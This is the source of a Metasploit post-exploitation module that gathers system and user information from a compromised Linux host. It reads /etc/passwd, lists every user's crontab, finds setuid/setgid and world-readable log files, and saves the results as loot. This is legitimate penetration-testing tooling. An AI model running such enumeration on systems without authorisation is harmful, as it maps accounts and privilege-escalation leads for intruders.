##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
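class MetasploitModule < Msf::Post
  include Msf::Post::File
  include Msf::Post::Linux::System

  # Account names are read from the target's /etc/passwd and interpolated into
  # a shell command line (`crontab -u <name> -l`). Only names made of plain
  # account characters are passed through; anything else is skipped and noted.
  SAFE_USERNAME = /\A[\w.$-]+\z/

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Linux Gather System and User Information',
        'Description' => %q{
          This module gathers system information. We collect
          installed packages, installed services, mount information,
          user list, user bash history and cron jobs
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Carlos Perez <carlos_perez[at]darkoperator.com>', # get_packages and get_services
          'Stephen Haywood <averagesecurityguy[at]gmail.com>', # get_cron and original enum_linux
          'sinn3r', # Testing and modification of original enum_linux
          'ohdae <bindshell[at]live.com>', # Combined separate mods, modifications and testing
          'Roberto Espreto <robertoespreto[at]gmail.com>', # log files and setuid/setgid
        ],
        'Platform' => ['linux'],
        'SessionTypes' => ['shell', 'meterpreter']
      )
    )
  end

  # Module entry point: collects distribution/kernel details, account names,
  # installed packages, configured services, cron jobs, mount/disk usage,
  # world-readable files under /var/log, setuid/setgid files and the kernel's
  # CPU vulnerability report, storing each result as its own loot entry.
  def run
    distro = get_sysinfo
    store_loot(
      'linux.version',
      'text/plain',
      session,
      "Distro: #{distro[:distro]},Version: #{distro[:version]}, Kernel: #{distro[:kernel]}",
      'linux_info.txt',
      'Linux Version'
    )

    # Print the info
    print_good('Info:')
    print_good("\t#{distro[:version]}")
    print_good("\t#{distro[:kernel]}")

    users = execute('/bin/cat /etc/passwd | cut -d : -f 1')
    # Trailing whitespace would otherwise defeat the `== 'root'` check in get_crons.
    user = execute('/usr/bin/whoami').to_s.strip

    print_good("\tModule running as \"#{user}\" user")

    installed_pkg = get_packages(distro[:distro])
    installed_svc = get_services(distro[:distro])

    mount = execute('/bin/mount -l')
    crons = get_crons(users, user)
    diskspace = execute('/bin/df -ahT')
    disks = "#{mount}\n\n#{diskspace}"
    logfiles = execute('find /var/log -type f -perm -4 2> /dev/null')
    # Older find(1) builds only accept `-perm +mode`; newer ones only `-perm /mode`,
    # hence the fallback.
    uidgid = execute('find / -xdev -type f -perm +6000 -perm -1 2> /dev/null || find / -xdev -type f -perm /6000 -perm -1 2> /dev/null')

    save('Linux version', distro)
    save('User accounts', users)
    save('Installed Packages', installed_pkg)
    save('Running Services', installed_svc)
    save('Cron jobs', crons)
    save('Disk info', disks)
    save('Logfiles', logfiles)
    save('Setuid/setgid files', uidgid)
    save('CPU Vulnerabilities', get_cpu_vulnerabilities)
  end

  # Stores +data+ as loot of type 'linux.enum.system' and reports the path.
  #
  # @param msg [String] loot description, also used in the status line
  # @param data [String, Object] content to store
  # @param ctype [String] MIME type of the stored content
  def save(msg, data, ctype = 'text/plain')
    loot = store_loot('linux.enum.system', ctype, session, data, nil, msg)
    print_status("#{msg} stored in #{loot}")
  end

  # Runs +cmd+ on the session, echoing it first in verbose mode.
  #
  # @param cmd [String] command line to execute
  # @return [String] command output as returned by cmd_exec
  def execute(cmd)
    vprint_status("Execute: #{cmd}")
    cmd_exec(cmd)
  end

  # Lists installed packages using the distribution's package manager.
  #
  # @param distro [String] distribution name as reported by get_sysinfo
  # @return [String] raw package-manager output, or '' when the distribution
  #   is not recognised (an error is printed in that case)
  def get_packages(distro)
    case distro
    when /fedora|redhat|suse|mandrake|oracle|amazon/
      execute('rpm -qa')
    when /slackware/
      execute('/bin/ls /var/log/packages')
    when /ubuntu|debian/
      execute('/usr/bin/dpkg -l')
    when /gentoo/
      execute('equery list')
    when /arch/
      execute('/usr/bin/pacman -Q')
    else
      print_error('Could not determine package manager to get list of installed packages')
      ''
    end
  end

  # Lists configured services using the distribution's service tooling.
  #
  # @param distro [String] distribution name as reported by get_sysinfo
  # @return [String] raw service listing, or '' when the distribution is not
  #   recognised (an error is printed in that case)
  def get_services(distro)
    case distro
    when /fedora|redhat|suse|mandrake|oracle|amazon/
      execute('/sbin/chkconfig --list')
    when /slackware/
      # `ls -F` suffixes executables with '*'; executable rc.d scripts are
      # treated as enabled, the rest as disabled.
      # NOTE(review): the second pattern's `A-z` range also matches `[\]^_\``;
      # `A-Z` was probably intended — confirm before changing the command.
      enabled = execute("ls -F /etc/rc.d | /bin/grep \'*$\'")
      disabled = execute("ls -F /etc/rc.d | /bin/grep \'[a-z0-9A-z]$\'")
      "\nEnabled:\n*************************\n#{enabled}\n\nDisabled:\n*************************\n#{disabled}"
    when /ubuntu|debian/
      execute('/usr/sbin/service --status-all')
    when /gentoo/
      execute('/bin/rc-status --all')
    when /arch/
      execute("/bin/egrep '^DAEMONS' /etc/rc.conf")
    else
      print_error('Could not determine the Linux Distribution to get list of configured services')
      ''
    end
  end

  # Reads the kernel's per-vulnerability mitigation status from sysfs.
  #
  # @return [String] one `file:status` line per entry, '' when unavailable
  def get_cpu_vulnerabilities
    execute('grep -r . /sys/devices/system/cpu/vulnerabilities').to_s
  end

  # Lists cron jobs. When the session runs as root and an account list is
  # available, every account is queried with `crontab -u`; otherwise only the
  # current account's crontab is listed.
  #
  # The previous implementation built the root listing inside a block-local
  # variable, so the method returned the array of account names instead of
  # the collected output; the result is now accumulated explicitly.
  #
  # @param users [String, nil] whitespace-separated account names from /etc/passwd
  # @param user [String] account the session runs as
  # @return [String] collected crontab output
  def get_crons(users, user)
    if user == 'root' && users
      vprint_status('Enumerating as root')
      users.chomp.split.each_with_object(+'') do |usr, cron_data|
        unless usr.match?(SAFE_USERNAME)
          vprint_status("Skipping account with unexpected characters in its name: #{usr.inspect}")
          next
        end
        cron_data << "*****Listing cron jobs for #{usr}*****\n"
        cron_data << "#{execute("crontab -u #{usr} -l")}\n\n"
      end
    else
      vprint_status("Enumerating as #{user}")
      cron_data = "***** Listing cron jobs for #{user} *****\n\n"
      cron_data << execute('crontab -l').to_s
    end
  end
end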